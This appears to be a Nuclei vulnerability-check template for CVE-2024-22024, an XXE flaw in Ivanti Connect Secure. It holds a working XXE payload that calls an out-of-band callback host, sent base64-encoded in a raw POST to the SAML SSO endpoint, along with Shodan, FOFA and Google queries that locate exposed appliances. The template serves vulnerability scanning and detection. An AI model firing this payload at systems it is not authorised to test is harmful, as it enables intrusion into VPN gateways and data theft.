id: CVE-2024-22024

info:
  name: Ivanti Connect Secure - XXE
  author: watchTowr
  severity: high
  description: |
    Ivanti Connect Secure is vulnerable to XXE (XML External Entity) injection.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information or remote code execution.
  remediation: |
    Apply the latest security patches or updates provided by Ivanti to fix the XXE vulnerability.
  reference:
    - https://labs.watchtowr.com/are-we-now-part-of-ivanti/
    - https://twitter.com/h4x0r_dz/status/1755849867149103106/photo/1
  metadata:
    max-request: 1
    vendor: ivanti
    product: connect_secure
    shodan-query:
      - "html:\"welcome.cgi?p=logo\""
      - http.title:"ivanti connect secure"
      - http.html:"welcome.cgi?p=logo"
    fofa-query:
      - body="welcome.cgi?p=logo"
      - title="ivanti connect secure"
    google-query: intitle:"ivanti connect secure"
  tags: cve,cve2024,xxe,ivanti
variables:
  payload: '<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM
    "http://{{interactsh-url}}/x"> %watchTowr;]><r></r>'

http:
  - raw:
      - |
        POST /dana-na/auth/saml-sso.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        SAMLRequest={{base64(payload)}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: body
        words:
          - '/dana-na/'
          - 'WriteCSS'
        condition: and
# digest: 490a00463044022064dfea002db32f325d2a6eb8b2611463d76db7ac1f5dfd008ad98fc469f8af9102202351431f37385f4819eda1fc126a5f723e1c525b7a99a88c5628f5f0a53e45a9:922c64590222798bb761d5b6d8e72950